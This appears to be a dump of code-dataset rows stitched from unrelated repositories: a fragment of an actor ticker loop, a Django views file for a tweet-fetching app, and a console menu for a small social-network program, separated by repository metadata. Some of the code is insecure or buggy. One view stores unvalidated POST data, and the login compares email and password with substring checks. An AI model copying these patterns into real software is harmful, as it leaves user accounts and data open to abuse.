    def opportunity(self):
        """Run every actor's newTicker(); the thread-pool path is disabled."""
        if False:
            # Parallel execution path, currently switched off.
            futures = []
            for actor in self.actors:
                futures.append(self.threadpool.submit(actor.newTicker))
            wait(futures)
        else:
            for actor in self.actors:
                try:
                    actor.newTicker()
                except Exception as err:
                    print (err)
                    print(traceback.format_exc())
                    # NOTE(review): err is an Exception object; selfLogger
                    # concatenates it to a str, which raises TypeError inside
                    # selfLogger (caught and printed there), so the message is
                    # never logged — pass str(err) instead.
                    actor.selfLogger ('error', err)
"abednego1979@163.com"
] | abednego1979@163.com |
0f82382175538ed0c951b9a4c59db262db7e5556 | 969776e5af5b190dd579c710a86f8b9e0382e9ff | /twittertools/tweetfetch/views.py | a8fd22d8a74b893c575f7b0a3b3a5b0b14014ec8 | [] | no_license | krdpk17/django-twitter | b36a2ee0e565e53ed1af4b57f204a0467d27206c | 37840a1835987250ae4731f9d9f63e4f517d0b08 | refs/heads/master | 2023-04-22T13:37:02.221538 | 2021-04-26T08:41:20 | 2021-04-26T08:41:20 | 262,332,817 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,772 | py | from django.views import generic
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy
from django.shortcuts import render, redirect
from django.views.generic import View, ListView
from django.contrib import messages
from .forms import FetcherCreateForm
from .fetcher_db_intf import store_fetch_query, fetch_all_queries_by_user
from .models import Fetcher
from .tables import FetcherTable
class IndexView(generic.ListView):
template_name = 'tweetfetch/index.html'
def get_queryset(self):
return
class CommandList(ListView):
template_name = 'table_template.html'
fetcher_table = FetcherTable
def get(self, request):
queries = fetch_all_queries_by_user(request.user)
table = self.fetcher_table(queries)
#istekler = queries.all()
return render(request, self.template_name, locals())
def post(self, request):
pass
class CommandCreate(CreateView):
    """Create a new fetch query for the logged-in user."""
    form_class = FetcherCreateForm
    # NOTE(review): this namespace is 'tweetsfetch' while the redirects below
    # use 'tweetfetch' — confirm which name is actually registered.
    success_url = reverse_lazy('tweetsfetch:index')
    template_name = 'tweetfetch/fetcher_form.html'
    def get(self, request):
        """Render an empty creation form."""
        form = self.form_class(None)
        context = {'form': form}
        return render(request, self.template_name, context)
    def post(self, request):
        """Persist the submitted query; redirect to the index on success,
        re-render the form with an error message on failure."""
        form = self.form_class(request.POST)
        context = {'form': form}
        # NOTE(review): form.is_valid() is never called, so form.data is the
        # raw POST QueryDict and no field validation/cleaning happens here.
        #Store this info in the Database
        status = store_fetch_query(form.data, request.user)
        if status:
            messages.success(request, 'Stored query in the DB')
            return redirect('tweetfetch:index')
        else:
            messages.error(request, 'Failed to store query. Please retry')
            return render(request, self.template_name, context)
"62544105+krdpk1717@users.noreply.github.com"
] | 62544105+krdpk1717@users.noreply.github.com |
88c6f9687795855780c7f84d69dc1ac0aaf87deb | eff3b7a036be3191b8844364339c2c36c5cadc5b | /sistema.py | ac18f36c924b8deb5311ba56d101bdf37f2da85d | [] | no_license | eliabepaz/rede_social | bfde47d7defb71f2f416437299e9fbc1bb475950 | bbef6446999ed64f5b7c56e812425b0ff9cf3d56 | refs/heads/master | 2021-09-07T02:00:13.211422 | 2018-02-15T12:20:18 | 2018-02-15T12:20:18 | 109,072,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,140 | py | from acounts import Bd
from acounts import Conta
from acounts import Loguin
from feed import Perfil
banco = Bd()
log = Loguin()
perfil = Perfil()
class Sistem:
def __init__(self):
pass
def menu(self):
print('1 - Cadastrar conta')
print('2 - Loguin')
print('x - Sair')
opcao = input('Digite a opção: ')
if opcao == '1':
usuario = Conta
usuario.nome = input('Digite seu nome: ')
usuario.idade = input('Digite sua idade: ')
usuario.telefone = input('Digite seu telefone: ')
usuario.endereco = input('Digite seu endereço: ')
log.email = input('Digite seu email: ')
log.senha = input('Digite sua senha: ')
banco.insert_user(usuario,log)
if opcao == '2':
email = input('Digite seu email: ')
senha = input('Digite sua senha: ')
if email in log.email and senha in log.senha:
opc = ''
while opc != 'x':
opc = perfil.menu_feed(email, senha)
return(opcao)
| [
"noreply@github.com"
] | noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.